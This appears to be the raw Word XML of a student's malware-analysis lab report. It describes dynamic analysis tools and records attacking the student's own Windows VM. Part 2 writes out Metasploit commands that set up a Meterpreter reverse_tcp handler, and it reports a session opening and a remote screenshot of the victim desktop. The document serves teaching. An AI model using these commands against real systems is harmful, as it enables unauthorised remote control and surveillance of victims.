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27C" w:rsidRDefault="00000000" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000002" w14:textId="53CE8627" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>The purpose of this lab is to practice the basic dynamic analysis tools and analyze basic Network traffic. In this lab, you’ll be using the ‘test-malware’ file you created in the first week of the semester.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000003" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000004"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This document outlines the major steps you will have to take, and you will need to provide answers to the questions asked. There are no restrictions on resources that can be used to complete the assignment. This includes consulting with other students and the instructor. I only ask that you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>will not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> share your report with other students.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000005" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582194FA" w14:textId="36E9EDDA" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Intro – Basic Dynamic Analysis Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C11F25A" w14:textId="3885BC81" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Based on the slides, the textbook, and/or other sources, please provide a 1-2 sentence description of what each of the following basic dynamic analysis tools does:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586BBC46" w14:textId="577A4D0D" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>--------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90B932" w14:textId="46783D40" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Procmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00437549">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">It shows </w:t>
      </w:r>
      <w:r w:rsidR="007F6CF5">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00437549">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>information about Registry, File system, Network, Processes of a machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8059D1" w14:textId="51E47F87" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Process Explorer:</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00566B5D">
        <w:t>It shows the information about which processes have been loaded</w:t>
      </w:r>
      <w:r w:rsidR="002266D2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D33D29" w14:textId="6527E027" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Regshot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007D2DA6">
        <w:t>It can take a snapshot of Registry of a Window. You can get a difference between the snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE8560" w14:textId="20B70503" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>Wireshark:</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EC11DD">
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidR="00983572">
        <w:t>is network protocol analyzer. Using this, we can see what information is going and coming out from a machine.</w:t>
      </w:r>
      <w:r w:rsidR="00EC11DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FDA1F3" w14:textId="266A90FA" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>INetSim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74090896" w14:textId="3DB27904" w:rsidR="00E7527C" w:rsidRPr="00E85145" w:rsidRDefault="00E85145" w:rsidP="009F6C1F">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r>
        <w:t>kind of a simulator for common internet services. It is used to analyze network behavior of unknown malware programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0BE71" w14:textId="02C756A0" w:rsidR="00E7527C" w:rsidRDefault="507E2898" w:rsidP="507E2898">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="507E2898">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>--------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000006" w14:textId="3EFCAB21" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="507E2898">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000007" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000"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t>Part  1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Snapshot your Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000008"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Although ‘test-malware’ will not harm your computer, it is a good habit to take a snapshot of the VM before analyzing new malware on it.  Snapshot your VM </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>now, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> add a screenshot of your snapshot here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000009"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0A" w14:textId="0EC97662" w:rsidR="00E7527C" w:rsidRDefault="002364D6" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61CF43EC" wp14:editId="61AAE7AC">
            <wp:extent cx="5943600" cy="3820160"/>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0160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A424DD0" w14:textId="0E0AF3D8" w:rsidR="002364D6" w:rsidRDefault="002364D6" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55395B6B" w14:textId="095B12B7" w:rsidR="002364D6" w:rsidRPr="002364D6" w:rsidRDefault="002364D6" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> took a snapshot before doing anything to do with dynamic analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000C" w14:textId="02C756A0"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0D" w14:textId="6F21DED5" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016E8705" w14:textId="083E8530" w:rsidR="0088494E" w:rsidRDefault="0088494E" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61884905" w14:textId="44662E34" w:rsidR="0088494E" w:rsidRDefault="0088494E" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0759E8" w14:textId="7810EB06" w:rsidR="0088494E" w:rsidRDefault="0088494E" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C154BE7" w14:textId="77777777" w:rsidR="0088494E" w:rsidRPr="0088494E" w:rsidRDefault="0088494E" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000000E" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000"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lastRenderedPageBreak/>
        <w:t>Part  2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Launch an attack on your Windows VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000F"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1. Go to your Kali VM, and type the following commands to launch an attack on your Windows VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000010" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000011" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000012" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000013" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000014" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST 0.0.0.0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000015" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="0F38A9A9" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000016" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000017" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00000000" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>On your Windows VM, double-click ‘test-malware’. Go back to your Kali VM. What do you see?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62640409"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18" w14:textId="451B4629" w:rsidR="00E7527C" w:rsidRPr="0088494E" w:rsidRDefault="00193574" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">From the text from the Kali, </w:t>
      </w:r>
      <w:r w:rsidR="00005C8E" w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Meterpreter session has opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000019" w14:textId="36494AA1" w:rsidR="00E7527C" w:rsidRDefault="00193574" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="722A82E7" wp14:editId="3ED61751">
            <wp:extent cx="5935980" cy="310896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0000001A" w14:textId="53B9AD15"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1B" w14:textId="77777777" w:rsidR="00E7527C" w:rsidRDefault="00E7527C" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0000001C"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Type ‘screenshot’ in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0F38A9A9">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell. What do you get? Add a screenshot of the image here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E6F25"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1D" w14:textId="30CF39C0" w:rsidR="00E7527C" w:rsidRPr="0088494E" w:rsidRDefault="000E5409" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>When typed ‘screenshot’, I got a</w:t>
      </w:r>
      <w:r w:rsidR="00ED3F36">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> image file.</w:t>
      </w:r>
      <w:r w:rsidR="00CF6221" w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wow, I opened </w:t>
      </w:r>
      <w:r w:rsidR="003032DA" w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>it,</w:t>
      </w:r>
      <w:r w:rsidR="00CF6221" w:rsidRPr="0088494E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it was the screenshot of the victim Window!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D0ED1" w14:textId="68F88579" w:rsidR="000E5409" w:rsidRDefault="00163126" w:rsidP="0F38A9A9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
